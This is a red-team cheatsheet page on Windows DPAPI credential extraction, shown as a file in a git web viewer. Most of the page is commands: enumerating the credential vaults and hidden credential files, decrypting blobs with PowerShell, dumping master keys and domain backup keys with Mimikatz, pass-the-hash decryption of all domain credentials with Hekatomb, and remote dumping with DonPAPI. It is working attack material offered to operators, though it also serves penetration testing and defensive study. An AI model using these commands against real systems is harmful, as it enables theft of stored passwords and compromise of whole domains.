daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

windows-dpapi.md (4871B)


      1 ---
      2 title: "Windows - DPAPI"
      3 section: "Red Team"
      4 sectionSlug: "redteam"
      5 sourcePath: "docs/redteam/evasion/windows-dpapi.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/redteam/evasion/windows-dpapi.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Windows - DPAPI
     12 
     13 > On Windows, credentials saved in the Windows Credentials Manager are encrypted using Microsoft's Data Protection API and stored as "blob" files in user AppData folder.
     14 
     15 ## Summary
     16 
     17 * [Data Protection API](#data-protection-api)
     18     * [List Credential Files](#list-credential-files)
     19     * [DPAPI LocalMachine Context](#dpapi-localmachine-context)
     20     * [Mimikatz - Credential Manager & DPAPI](#mimikatz---credential-manager--dpapi)
     21     * [Hekatomb - Steal all credentials on domain](#hekatomb---steal-all-credentials-on-domain)
     22     * [DonPAPI - Dumping DPAPI credz remotely](#donpapi---dumping-dpapi-credz-remotely)
     23 
     24 ## Data Protection API
     25 
     26 * Outside of a domain: the user's `password hash` is used to encrypt these "blobs".
     27 * Inside a domain: the `domain controller's master key` is used to encrypt these blobs.
     28 
     29 With the extracted private key of the domain controller, it is possible to decrypt all the blobs, and therefore to recover all the secrets recorded in the Windows identification manager of all the work  
     30 stations in the domain.
     31 
     32 ```ps1
     33 vaultcmd /list
     34 
     35 VaultCmd /listcreds:<namevault>|<guidvault> /all
     36 vaultcmd /listcreds:"Windows Credentials" /all
     37 ```
     38 
     39 ### List Credential Files
     40 
     41 ```ps1
     42 dir /a:h C:\Users\username\AppData\Local\Microsoft\Credentials\
     43 dir /a:h C:\Users\username\AppData\Roaming\Microsoft\Credentials\
     44 
     45 Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
     46 Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\
     47 ```
     48 
     49 ### DPAPI LocalMachine Context
     50 
     51 The `LocalMachine` context is used to protect data that is intended to be shared across different users or services on a single machine. This means that any user or service running on the machine can access the protected data with the appropriate credentials.
     52 
     53 In contrast, the `CurrentUser` context is used to protect data that is intended to be accessed only by the user who encrypted it, and cannot be accessed by other users or services on the same machine.
     54 
     55 ```ps1
     56 $a = [System.Convert]::FromBase64String("AQAAANCMnd[...]")
     57 $b = [System.Security.Cryptography.ProtectedData]::Unprotect($a, $null, [System.Security.Cryptography.DataProtectionScope]::LocalMachine)
     58 [System.Text.Encoding]::ASCII.GetString($b)
     59 ```
     60 
     61 ### Mimikatz - Credential Manager & DPAPI
     62 
     63 ```powershell
     64 # check the folder to find credentials
     65 dir C:\Users\<username>\AppData\Local\Microsoft\Credentials\*
     66 
     67 # check the file with mimikatz
     68 mimikatz dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\2647629F5AA74CD934ECD2F88D64ECD0
     69 # find master key
     70 mimikatz !sekurlsa::dpapi
     71 # use master key
     72 mimikatz dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\2647629F5AA74CD934ECD2F88D64ECD0 /masterkey:95664450d90eb2ce9a8b1933f823b90510b61374180ed5063043273940f50e728fe7871169c87a0bba5e0c470d91d21016311727bce2eff9c97445d444b6a17b
     73 
     74 # find and export backup keys
     75 lsadump::backupkeys /system:dc01.lab.local /export
     76 # use backup keys
     77 dpapi::masterkey /in:"C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Protect\S-1-5-21-2552734371-813931464-1050690807-1106\3e90dd9e-f901-40a1-b691-84d7f647b8fe" /pvk:ntds_capi_0_d2685b31-402d-493b-8d12-5fe48ee26f5a.pvk
     78 ```
     79 
     80 ### Hekatomb - Steal all credentials on domain
     81 
     82 > [ProcessusT/Hekatomb](https://github.com/ProcessusT/HEKATOMB) is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers. Finally, it will extract domain controller private key through RPC uses it to decrypt all credentials.
     83 
     84 ```python
     85 pip3 install hekatomb
     86 hekatomb -hashes :ed0052e5a66b1c8e942cc9481a50d56 DOMAIN.local/administrator@10.0.0.1 -debug -dnstcp
     87 ```
     88 
     89 ![Data in memory](https://github.com/ProcessusT/HEKATOMB/raw/main/.assets/github1.png)
     90 
     91 ### DonPAPI - Dumping DPAPI credz remotely
     92 
     93 * [login-securite/DonPAPI](https://github.com/login-securite/DonPAPI)
     94 
     95 ```ps1
     96 DonPAPI.py domain/user:passw0rd@target
     97 DonPAPI.py --hashes <LM>:<NT> domain/user@target
     98 
     99 # using domain backup key
    100 dpapi.py backupkeys --export -t domain/user:passw0rd@target_dc_ip
    101 python DonPAPI.py -pvk domain_backupkey.pvk domain/user:passw0rd@domain_network_list
    102 ```
    103 
    104 ## References
    105 
    106 * [DPAPI - Extracting Passwords - HackTricks](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords)
    107 * [DON PAPI, OU L’ART D’ALLER PLUS LOIN QUE LE DOMAIN ADMIN - LoginSecurité - CORTO GUEGUEN - 4 MARS 2022](https://www.login-securite.com/2022/03/04/don-papi-ou-lart-daller-plus-loin-que-le-avec-dpapi/)